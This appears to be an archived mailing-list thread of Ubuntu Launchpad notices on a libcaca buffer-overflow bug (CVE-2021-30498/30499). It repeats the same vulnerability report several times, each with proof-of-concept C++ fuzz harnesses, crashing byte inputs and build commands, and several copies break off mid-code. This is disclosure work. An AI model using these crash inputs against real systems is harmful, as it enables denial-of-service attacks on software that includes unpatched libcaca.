[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

2022-05-29 Thread Fantu
** Changed in: libcaca (Ubuntu)
   Status: Confirmed => Fix Released

-- 
https://bugs.launchpad.net/bugs/1923273

Title:
  buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
  export_troff

Status in libcaca package in Ubuntu:
  Fix Released

Bug description:
  Hello Ubuntu Security Team
  I used libFuzzer to test the libcaca API and found two crashes:

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code file (as call stack):

   -> caca_export_canvas_to_memory() in libcaca/caca/codec/export.c

   -> caca_export_memory() in libcaca/caca/codec/export.c

   -> export_tga() in libcaca/caca/codec/export.c

   -> export_troff() in libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make

  ```

  3. Run POC.sh to compile poc_troff.cc and poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

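  // libFuzzer entry point: copies the input into a NUL-terminated buffer,
  // imports it into each of four frames of a canvas created as 0x0, then
  // exports the canvas with the "troff" exporter (the call the report is about).
  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if (Size < 8) return 0;

    size_t len = 0;
    char *buffer = (char *)malloc(Size + 1);
    if (buffer == NULL) return 0;
    memcpy(buffer, Data, Size);
    buffer[Size] = '\0';

    caca_canvas_t *cv = caca_create_canvas(0, 0);
    if (cv == NULL) {
      free(buffer);
      return 0;
    }
    for (int i = 0; i < 4; i++)
      caca_create_frame(cv, 0);
    for (int i = 0; i < 4; i++) {
      caca_set_frame(cv, i);
      // strlen() stops at the first NUL byte, so only the leading NUL-free
      // part of the input is imported. Kept as in the report so the
      // reproducer behaves the same.
      caca_import_canvas_from_memory(cv, buffer, strlen(buffer), "");
    }

    // The third argument was lost from the archived text; the API takes a
    // size_t* that receives the exported size, and len is declared for it.
    void *reData = caca_export_canvas_to_memory(cv, "troff", &len);
    free(reData);
    caca_free_canvas(cv);
    free(buffer);

    // libFuzzer expects 0; the original fell off the end of a non-void function.
    return 0;
  }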

  
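  // Standalone driver: feeds one fixed 9-byte input to the harness so the
  // report can be reproduced without the libFuzzer runtime.
  int main(int args, char *argv[]) {
    unsigned char buffer[] =
        {0x5f, 0x20, 0x6f, 0x75, 0x6e, 0x64, 0x0a, 0x40, 0x11};
    size_t len = sizeof(buffer) / sizeof(unsigned char);

    LLVMFuzzerTestOneInput((const uint8_t *)buffer, len);
    // A size_t value needs %zu; the original passed it to %d.
    printf("%zu\n", len);

    return 0;
  }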
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

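  // libFuzzer entry point: copies the input into a NUL-terminated buffer,
  // imports it into each of four frames of a canvas created as 0x0, then
  // exports the canvas with the "tga" exporter (the call the report is about).
  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if (Size < 8) return 0;

    size_t len = 0;
    char *buffer = (char *)malloc(Size + 1);
    if (buffer == NULL) return 0;
    memcpy(buffer, Data, Size);
    buffer[Size] = '\0';

    caca_canvas_t *cv = caca_create_canvas(0, 0);
    if (cv == NULL) {
      free(buffer);
      return 0;
    }
    for (int i = 0; i < 4; i++)
      caca_create_frame(cv, 0);
    for (int i = 0; i < 4; i++) {
      caca_set_frame(cv, i);
      // strlen() stops at the first NUL byte, so only the leading NUL-free
      // part of the input is imported. Kept as in the report so the
      // reproducer behaves the same.
      caca_import_canvas_from_memory(cv, buffer, strlen(buffer), "");
    }

    // The third argument was lost from the archived text; the API takes a
    // size_t* that receives the exported size, and len is declared for it.
    void *reData = caca_export_canvas_to_memory(cv, "tga", &len);
    free(reData);
    caca_free_canvas(cv);
    free(buffer);
    return 0;
  }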

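  // Standalone driver: feeds one fixed 9-byte input to the harness so the
  // report can be reproduced without the libFuzzer runtime.
  // The first byte is 0x00, so strlen() in the harness returns 0 and the
  // import call is given a zero length; the canvas stays as created.
  int main(int args, char *argv[]) {
    unsigned char buffer[] =
        {0x00, 0xff, 0xff, 0x23, 0x64, 0x72, 0x23, 0x20, 0x11};
    size_t len = sizeof(buffer) / sizeof(unsigned char);

    LLVMFuzzerTestOneInput((const uint8_t *)buffer, len);
    // A size_t value needs %zu; the original passed it to %d.
    printf("%zu\n", len);

    return 0;
  }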
  EOF

  clang++ 

[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

2021-09-23 Thread Marc Deslauriers
** Changed in: libcaca (Ubuntu)
   Status: New => Confirmed

-- 
https://bugs.launchpad.net/bugs/1923273

Title:
  buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
  export_troff

Status in libcaca package in Ubuntu:
  Confirmed

Bug description:
  Hello Ubuntu Security Team
  I used libFuzzer to test the libcaca API and found two crashes:

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code file (as call stack):

   -> caca_export_canvas_to_memory() in libcaca/caca/codec/export.c

   -> caca_export_memory() in libcaca/caca/codec/export.c

   -> export_tga() in libcaca/caca/codec/export.c

   -> export_troff() in libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make

  ```

  3. Run POC.sh to compile poc_troff.cc and poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

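  // libFuzzer entry point: copies the input into a NUL-terminated buffer,
  // imports it into each of four frames of a canvas created as 0x0, then
  // exports the canvas with the "troff" exporter (the call the report is about).
  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if (Size < 8) return 0;

    size_t len = 0;
    char *buffer = (char *)malloc(Size + 1);
    if (buffer == NULL) return 0;
    memcpy(buffer, Data, Size);
    buffer[Size] = '\0';

    caca_canvas_t *cv = caca_create_canvas(0, 0);
    if (cv == NULL) {
      free(buffer);
      return 0;
    }
    for (int i = 0; i < 4; i++)
      caca_create_frame(cv, 0);
    for (int i = 0; i < 4; i++) {
      caca_set_frame(cv, i);
      // strlen() stops at the first NUL byte, so only the leading NUL-free
      // part of the input is imported. Kept as in the report so the
      // reproducer behaves the same.
      caca_import_canvas_from_memory(cv, buffer, strlen(buffer), "");
    }

    // The third argument was lost from the archived text; the API takes a
    // size_t* that receives the exported size, and len is declared for it.
    void *reData = caca_export_canvas_to_memory(cv, "troff", &len);
    free(reData);
    caca_free_canvas(cv);
    free(buffer);

    // libFuzzer expects 0; the original fell off the end of a non-void function.
    return 0;
  }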

  
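  // Standalone driver: feeds one fixed 9-byte input to the harness so the
  // report can be reproduced without the libFuzzer runtime.
  int main(int args, char *argv[]) {
    unsigned char buffer[] =
        {0x5f, 0x20, 0x6f, 0x75, 0x6e, 0x64, 0x0a, 0x40, 0x11};
    size_t len = sizeof(buffer) / sizeof(unsigned char);

    LLVMFuzzerTestOneInput((const uint8_t *)buffer, len);
    // A size_t value needs %zu; the original passed it to %d.
    printf("%zu\n", len);

    return 0;
  }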
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

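  // libFuzzer entry point: copies the input into a NUL-terminated buffer,
  // imports it into each of four frames of a canvas created as 0x0, then
  // exports the canvas with the "tga" exporter (the call the report is about).
  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if (Size < 8) return 0;

    size_t len = 0;
    char *buffer = (char *)malloc(Size + 1);
    if (buffer == NULL) return 0;
    memcpy(buffer, Data, Size);
    buffer[Size] = '\0';

    caca_canvas_t *cv = caca_create_canvas(0, 0);
    if (cv == NULL) {
      free(buffer);
      return 0;
    }
    for (int i = 0; i < 4; i++)
      caca_create_frame(cv, 0);
    for (int i = 0; i < 4; i++) {
      caca_set_frame(cv, i);
      // strlen() stops at the first NUL byte, so only the leading NUL-free
      // part of the input is imported. Kept as in the report so the
      // reproducer behaves the same.
      caca_import_canvas_from_memory(cv, buffer, strlen(buffer), "");
    }

    // The third argument was lost from the archived text; the API takes a
    // size_t* that receives the exported size, and len is declared for it.
    void *reData = caca_export_canvas_to_memory(cv, "tga", &len);
    free(reData);
    caca_free_canvas(cv);
    free(buffer);
    return 0;
  }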

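  // Standalone driver: feeds one fixed 9-byte input to the harness so the
  // report can be reproduced without the libFuzzer runtime.
  // The first byte is 0x00, so strlen() in the harness returns 0 and the
  // import call is given a zero length; the canvas stays as created.
  int main(int args, char *argv[]) {
    unsigned char buffer[] =
        {0x00, 0xff, 0xff, 0x23, 0x64, 0x72, 0x23, 0x20, 0x11};
    size_t len = sizeof(buffer) / sizeof(unsigned char);

    LLVMFuzzerTestOneInput((const uint8_t *)buffer, len);
    // A size_t value needs %zu; the original passed it to %d.
    printf("%zu\n", len);

    return 0;
  }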
  EOF

  clang++ -g poc_tga.cc 

[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

2021-04-12 Thread xiao huang
The issues have been assigned CVE-2021-30498 and CVE-2021-30499.

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30498

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30499

-- 
https://bugs.launchpad.net/bugs/1923273

Title:
  buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
  export_troff

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello Ubuntu Security Team
  I used libFuzzer to test the libcaca API and found two crashes:

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code file (as call stack):

   -> caca_export_canvas_to_memory() in libcaca/caca/codec/export.c

   -> caca_export_memory() in libcaca/caca/codec/export.c

   -> export_tga() in libcaca/caca/codec/export.c

   -> export_troff() in libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make

  ```

  3. Run POC.sh to compile poc_troff.cc and poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

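  // libFuzzer entry point: copies the input into a NUL-terminated buffer,
  // imports it into each of four frames of a canvas created as 0x0, then
  // exports the canvas with the "troff" exporter (the call the report is about).
  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if (Size < 8) return 0;

    size_t len = 0;
    char *buffer = (char *)malloc(Size + 1);
    if (buffer == NULL) return 0;
    memcpy(buffer, Data, Size);
    buffer[Size] = '\0';

    caca_canvas_t *cv = caca_create_canvas(0, 0);
    if (cv == NULL) {
      free(buffer);
      return 0;
    }
    for (int i = 0; i < 4; i++)
      caca_create_frame(cv, 0);
    for (int i = 0; i < 4; i++) {
      caca_set_frame(cv, i);
      // strlen() stops at the first NUL byte, so only the leading NUL-free
      // part of the input is imported. Kept as in the report so the
      // reproducer behaves the same.
      caca_import_canvas_from_memory(cv, buffer, strlen(buffer), "");
    }

    // The third argument was lost from the archived text; the API takes a
    // size_t* that receives the exported size, and len is declared for it.
    void *reData = caca_export_canvas_to_memory(cv, "troff", &len);
    free(reData);
    caca_free_canvas(cv);
    free(buffer);

    // libFuzzer expects 0; the original fell off the end of a non-void function.
    return 0;
  }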

  
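  // Standalone driver: feeds one fixed 9-byte input to the harness so the
  // report can be reproduced without the libFuzzer runtime.
  int main(int args, char *argv[]) {
    unsigned char buffer[] =
        {0x5f, 0x20, 0x6f, 0x75, 0x6e, 0x64, 0x0a, 0x40, 0x11};
    size_t len = sizeof(buffer) / sizeof(unsigned char);

    LLVMFuzzerTestOneInput((const uint8_t *)buffer, len);
    // A size_t value needs %zu; the original passed it to %d.
    printf("%zu\n", len);

    return 0;
  }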
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

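  // libFuzzer entry point: copies the input into a NUL-terminated buffer,
  // imports it into each of four frames of a canvas created as 0x0, then
  // exports the canvas with the "tga" exporter (the call the report is about).
  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if (Size < 8) return 0;

    size_t len = 0;
    char *buffer = (char *)malloc(Size + 1);
    if (buffer == NULL) return 0;
    memcpy(buffer, Data, Size);
    buffer[Size] = '\0';

    caca_canvas_t *cv = caca_create_canvas(0, 0);
    if (cv == NULL) {
      free(buffer);
      return 0;
    }
    for (int i = 0; i < 4; i++)
      caca_create_frame(cv, 0);
    for (int i = 0; i < 4; i++) {
      caca_set_frame(cv, i);
      // strlen() stops at the first NUL byte, so only the leading NUL-free
      // part of the input is imported. Kept as in the report so the
      // reproducer behaves the same.
      caca_import_canvas_from_memory(cv, buffer, strlen(buffer), "");
    }

    // The third argument was lost from the archived text; the API takes a
    // size_t* that receives the exported size, and len is declared for it.
    void *reData = caca_export_canvas_to_memory(cv, "tga", &len);
    free(reData);
    caca_free_canvas(cv);
    free(buffer);
    return 0;
  }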

  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 

[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

2021-04-11 Thread xiao huang
** Summary changed:

- libcaca buffer-overflow
+ buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

-- 
https://bugs.launchpad.net/bugs/1923273

Title:
  buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
  export_troff

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello Ubuntu Security Team
  I used libFuzzer to test the libcaca API and found two crashes:

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code file (as call stack):

   -> caca_export_canvas_to_memory() in libcaca/caca/codec/export.c

   -> caca_export_memory() in libcaca/caca/codec/export.c

   -> export_tga() in libcaca/caca/codec/export.c

   -> export_troff() in libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make

  ```

  3. Run POC.sh to compile poc_troff.cc and poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

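  // libFuzzer entry point: copies the input into a NUL-terminated buffer,
  // imports it into each of four frames of a canvas created as 0x0, then
  // exports the canvas with the "troff" exporter (the call the report is about).
  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if (Size < 8) return 0;

    size_t len = 0;
    char *buffer = (char *)malloc(Size + 1);
    if (buffer == NULL) return 0;
    memcpy(buffer, Data, Size);
    buffer[Size] = '\0';

    caca_canvas_t *cv = caca_create_canvas(0, 0);
    if (cv == NULL) {
      free(buffer);
      return 0;
    }
    for (int i = 0; i < 4; i++)
      caca_create_frame(cv, 0);
    for (int i = 0; i < 4; i++) {
      caca_set_frame(cv, i);
      // strlen() stops at the first NUL byte, so only the leading NUL-free
      // part of the input is imported. Kept as in the report so the
      // reproducer behaves the same.
      caca_import_canvas_from_memory(cv, buffer, strlen(buffer), "");
    }

    // The third argument was lost from the archived text; the API takes a
    // size_t* that receives the exported size, and len is declared for it.
    void *reData = caca_export_canvas_to_memory(cv, "troff", &len);
    free(reData);
    caca_free_canvas(cv);
    free(buffer);

    // libFuzzer expects 0; the original fell off the end of a non-void function.
    return 0;
  }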

  
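  // Standalone driver: feeds one fixed 9-byte input to the harness so the
  // report can be reproduced without the libFuzzer runtime.
  int main(int args, char *argv[]) {
    unsigned char buffer[] =
        {0x5f, 0x20, 0x6f, 0x75, 0x6e, 0x64, 0x0a, 0x40, 0x11};
    size_t len = sizeof(buffer) / sizeof(unsigned char);

    LLVMFuzzerTestOneInput((const uint8_t *)buffer, len);
    // A size_t value needs %zu; the original passed it to %d.
    printf("%zu\n", len);

    return 0;
  }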
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

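  // libFuzzer entry point: copies the input into a NUL-terminated buffer,
  // imports it into each of four frames of a canvas created as 0x0, then
  // exports the canvas with the "tga" exporter (the call the report is about).
  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if (Size < 8) return 0;

    size_t len = 0;
    char *buffer = (char *)malloc(Size + 1);
    if (buffer == NULL) return 0;
    memcpy(buffer, Data, Size);
    buffer[Size] = '\0';

    caca_canvas_t *cv = caca_create_canvas(0, 0);
    if (cv == NULL) {
      free(buffer);
      return 0;
    }
    for (int i = 0; i < 4; i++)
      caca_create_frame(cv, 0);
    for (int i = 0; i < 4; i++) {
      caca_set_frame(cv, i);
      // strlen() stops at the first NUL byte, so only the leading NUL-free
      // part of the input is imported. Kept as in the report so the
      // reproducer behaves the same.
      caca_import_canvas_from_memory(cv, buffer, strlen(buffer), "");
    }

    // The third argument was lost from the archived text; the API takes a
    // size_t* that receives the exported size, and len is declared for it.
    void *reData = caca_export_canvas_to_memory(cv, "tga", &len);
    free(reData);
    caca_free_canvas(cv);
    free(buffer);
    return 0;
  }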

  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 printf("%d\n",sizeof(buffer)/sizeof(unsigned char));